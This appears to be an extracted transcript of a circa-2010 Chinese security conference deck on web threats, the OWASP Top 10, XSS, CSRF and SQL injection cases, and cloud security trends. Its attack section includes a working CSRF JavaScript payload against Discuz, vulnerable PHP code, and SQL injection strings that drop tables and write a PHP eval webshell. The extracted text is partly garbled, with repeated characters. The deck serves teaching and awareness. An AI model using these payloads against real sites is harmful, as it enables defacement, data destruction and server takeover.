马杰 创新工场技术总监 - paper.seebug.org®‰全...外部威胁频繁...
TRANSCRIPT
马杰 创新工场技术总监马杰 创新工场技术总监
安全威胁现状
黑客产业链
入侵企业
服务器
出售
获取
金钱
盗取虚拟财产
窃取机密信息
(图纸、财务报
表等)
盗取个人信息
出售
洗钱
收费传播流
氓软件
拒绝服务攻
击
发送垃圾邮
件
盗取网上银行账户
组建僵尸网络
主动攻击勒
索网站
受雇攻击收
取佣金
批量入侵
门户网站
盗取证券交易账户
� 黑客产业发展迅速– 国内销售木马的站点已经超过6000个
安全威胁现状
� Web网站成为主要被攻击目标– 每周有1000万以上网页被植入木马
安全威胁现状
网络安全现状触目惊心
� 2010年上半年网络安全报告
外部威胁频繁 安全漏洞屡见不鲜
据CNCERT统计,2010 年中国大陆:
�有近3.5万个网站被黑客篡改
�被篡改的政府网站高达4635 个,比09 年上升67.6%
�约60%的部委级网站存在不同程度的安全�
� 收集整理信息安全高危漏洞649 个,典型的高危漏洞有:
� 论坛建站软件Discuz!高危漏洞
� MySQL yaSSL库证书解析远程溢出漏洞
� IBM 公司Lotus Domino/Notes 群件平台密码散列泄露漏洞
�年收集整理Web应用漏洞占总漏洞数9%,据第3位
层出不穷的应用安全事件
Web应用所面临的风险总览
� 系统层面系统层面系统层面系统层面 –––– 如低版本的如低版本的如低版本的如低版本的IIS, Apache, IIS, Apache, IIS, Apache, IIS, Apache, 缺乏补丁的缺乏补丁的缺乏补丁的缺乏补丁的
Windows.Windows.Windows.Windows.
� 应用层面应用层面应用层面应用层面
� SQL SQL SQL SQL 注入注入注入注入
� 跨站脚本跨站脚本跨站脚本跨站脚本((((钓鱼攻击钓鱼攻击钓鱼攻击钓鱼攻击))))� 跨站脚本跨站脚本跨站脚本跨站脚本((((钓鱼攻击钓鱼攻击钓鱼攻击钓鱼攻击))))
� 表单漏洞表单漏洞表单漏洞表单漏洞
� 上传漏洞上传漏洞上传漏洞上传漏洞
� 网页木马网页木马网页木马网页木马((((恶意代码恶意代码恶意代码恶意代码))))
� ……………………
� 网络层面网络层面网络层面网络层面 ---- ARPARPARPARP欺骗攻击欺骗攻击欺骗攻击欺骗攻击
网络安全威胁的转变
主机
攻击
应用
网络
攻击
应用
攻击
� 注入 - Injection
� 跨站脚本 - Cross-Site Scripting (XSS)
� 失效的验证和会话管理 - Broken Authentication and Session
Management
� 不安全的直接对象访问 - Insecure Direct Object References
� 跨站请求伪造 - Cross-Site Request Forgery(CSRF)
� 不正确的安全设置 - Security Misconfiguration
OWASP TOP 10漏洞剖析
� 不正确的安全设置 - Security Misconfiguration
� 不安全的加密存储 - Insecure Cryptographic Storage
� URL访问限制缺失 - Failure to Restrict URL Access
� 没有足够的传输层防护 - Insufficient Transport Layer Protection
� 未验证的重定向和跳转 - Unvalidated Redirects and Forwards
开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)
Web攻击案例
• XSS攻击案列
• CSRF攻击案列
• SQL攻击案列
• …
XSS攻击
• 漏洞简介
• 攻击者通过诱骗受害者点击特殊编码的URLURLURLURL窃取
CookieCookieCookieCookie资料
• 攻击步骤
• 1 寻找WebWebWebWeb应用的弱点
• 2 向Web应用插入XSSXSSXSSXSS攻击代码
• 攻击危害
• XSS钓鱼
• XSS挂马
• XSS蠕虫
XSS漏洞
危害一:利用XSS钓鱼
危害二:利用XSS挂马
危害三:XSS蠕虫(新浪蠕虫)
中毒现象
1 大量用户被劫持传播
恶意信息
2 个人微博不断自动刷
屏和转发垃圾链接
3 85分钟内导致3万多
新浪微博用户中招
现象与分析
很显然真实的地址会被写入到很显然真实的地址会被写入到很显然真实的地址会被写入到很显然真实的地址会被写入到actionactionactionaction----datadatadatadata
的属性中去的属性中去的属性中去的属性中去,,,,由于由于由于由于actionactionactionaction----datadatadatadata的值没有进行合适的值没有进行合适的值没有进行合适的值没有进行合适
的过滤导致攻击者可以输入畸形的数据插入的过滤导致攻击者可以输入畸形的数据插入的过滤导致攻击者可以输入畸形的数据插入的过滤导致攻击者可以输入畸形的数据插入JSJSJSJS脚本脚本脚本脚本,,,,
闭合前面的双引号和尖括号闭合前面的双引号和尖括号闭合前面的双引号和尖括号闭合前面的双引号和尖括号,,,,从而造成从而造成从而造成从而造成XSSXSSXSSXSS攻击攻击攻击攻击。。。。
漏洞成因
1. 新浪微博“中毒”现象的实际成因就由于Web漏洞的
造成。
2. 攻击者利用新浪微博存在的XSS漏洞,并结合CSRF漏
洞,从而发动了这一起”中毒”攻击。
对新浪微博攻击的特点
1 技术门槛低
2 攻击模式成熟
3 代码复用性高
当出现新的XSS漏
洞,这些功能函
数代码可以再次
发挥作用!!!
CSRF攻击
• 漏洞简介:
• 利用被攻击者的身份,冒名发送恶意请求以完
成攻击者的个人目的。
• 攻击步骤:• 攻击步骤:
• 1 寻找XSS攻击弱点
• 2 根据特殊的需求,构造代码,利用管理员的
权限进行越权操作
CSRF攻击
CSRF攻击代码
xmlhttp=window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");xmlhttp.open("GET","http://localhost/Discuz1_5/home.php?mod=space&uid=1&do=profile");xmlhttp.send(null);var datas=xmlhttp.responseText;var reg=/formhash=([\w\d]+)/i;var arr=reg.exec(datas);var adminhash=arr[1];
f=document.createElement("form");f.setAttribute("method","post");f.setAttribute("action","http://localhost/Discuz1_5/forum.php?mod=post&action=newthread&fid=2&extra=&topicsubmit=yes");
formhash=document.createElement("input");formhash.setAttribute("name","formhash");formhash.setAttribute("name","formhash");formhash.setAttribute("value",adminhash);f.appendChild(formhash);
subject=document.createElement("input");subject.setAttribute("name","subject");subject.setAttribute("value","CSRF");f.appendChild(subject);
var data="This is Hacked by CSRF!";message=document.createElement("textarea");message.setAttribute("name","message");message.innerText=data;f.appendChild(message);document.body.appendChild(f);f.submit();
SQL注入攻击
• 漏洞简介
• WEB程序将客户端输入当作SQL语句执行
• 攻击步骤:
1 寻找SQL注入点
2 构造SQL攻击语句
3 获取Web服务器权限
SQL注入攻击实例
• 问题代码(PHP+MySQL5.0)
if empty($_GET["id"])$id=1;
else$id=$_GET["id"];
$sql = "select title,content from news where id $sql = "select title,content from news where id =". $id;$conn = mysql_connect("localhost","root","root");mysql_select_db("test");mysql_query($sql);
修改数据库内容提交语句:http://target/news.php?id=1;update news set title=‘ new’ where id=1select * from news where id=1; update news set titl e=‘new’ where id=1
删除其它数据表提交语句:http://target/news.php?id=1;drop table dataselect * from news where id=1;drop table data
直接写入WebShell提交语句:http://target/news.php?id=1 and 1=2 union select 1 ,2,<?php eval ($_POST[cmd]) ; ?>’ from news into outfile ‘C:/AppServ/www/one.php’
select * from news where id=1 and 1=2 union select 1,2,'<?php eval($_POST[cmd]); ?>’ into outfile ‘C:/AppServ/w ww/one.php’
防病毒卡防病毒卡防病毒卡防病毒卡
1990199019901990
杀毒软件杀毒软件杀毒软件杀毒软件
2000200020002000
硬件网关硬件网关硬件网关硬件网关
2005200520052005
云安全服务云安全服务云安全服务云安全服务
2010201020102010
Cloud Service is the future of Security
Enterprise Server Personal
云模式开启二十年信息安全技术新篇章
�云模式打破传统云模式打破传统云模式打破传统云模式打破传统
技术与模式
产品堆叠时代产品堆叠时代产品堆叠时代产品堆叠时代体系建设时代体系建设时代体系建设时代体系建设时代
云模式时代云模式时代云模式时代云模式时代
IT技术与安全的发展历程
�安全就是防病毒安全就是防病毒安全就是防病毒安全就是防病毒
计算机所面临的所有
问题都是病毒软件的
恶意破坏,防护视角
主要为病毒驱动。
�产品百花齐放产品百花齐放产品百花齐放产品百花齐放
众多信息安全领域产
品在不同层面起组合
部署起到全面综合的
防御效果,防护视角
为攻防对抗。
�管理运维是核心管理运维是核心管理运维是核心管理运维是核心
安全建设重心转向合
规管理运维,防护视
角强调体系化建设,
提出纵深技术防御与
IT合规治理相结合。
在技术上云与IPV6一起出
现后提出将安全防御作为
服务能力虚拟化到计算基
础平台中,作为服务进行
提供。在管理运维上云要
求拓展视角构建全员一致
共同参与的平台化模式。
时间推移
防病毒时代防病毒时代防病毒时代防病毒时代产品堆叠时代产品堆叠时代产品堆叠时代产品堆叠时代
• SaaS– Security as a Service
– SaaS已经大行其道,中国的SaaS在那里?
云安全的未来
• 安全的SaaS模式
• 完全脱离客户端或者设备独立存在
• 物联网
– 处处都是联网设备
– 大大小小计算中心遍布
– 关系到我们生活的方方面面
云安全的未来
– 关系到我们生活的方方面面
– 对安全行业的另一个挑战和市场
• 脑部植入电极
• 美国伊利诺伊大学、宾夕法尼亚大学、塔夫茨大学
等多家机构参与了这项研究
• 2010年4月18日发表于《自然-材料》月刊
云安全的未来
• 未来安全直接关系生命安危?
• 客户端安全已经充分重视
• 云端安全人人有关
– 网站是每个企业的迷你云端
– 游戏/电商厂家的云端
云端安全
– 游戏/电商厂家的云端
• 云端安全如何保护
– 传统设备+服务体系?
– 探讨SaaS模式
• 美国风险投资协会的数据显示
– 第一季度全美安全领域的风投额已达到1.474亿– 今年全年有望超过4.323亿美元
• 安全风投升温的原因
投资市场
• 安全风投升温的原因
– 今年来一系列的安全/攻击事件
– 云端/移动设备等新兴领域需要相应的安全系统
– 大企业对这类公司的收购
• Intel 76.8亿美元收购 McAfee• Dell收购SecureWorks• HP收购Fortiry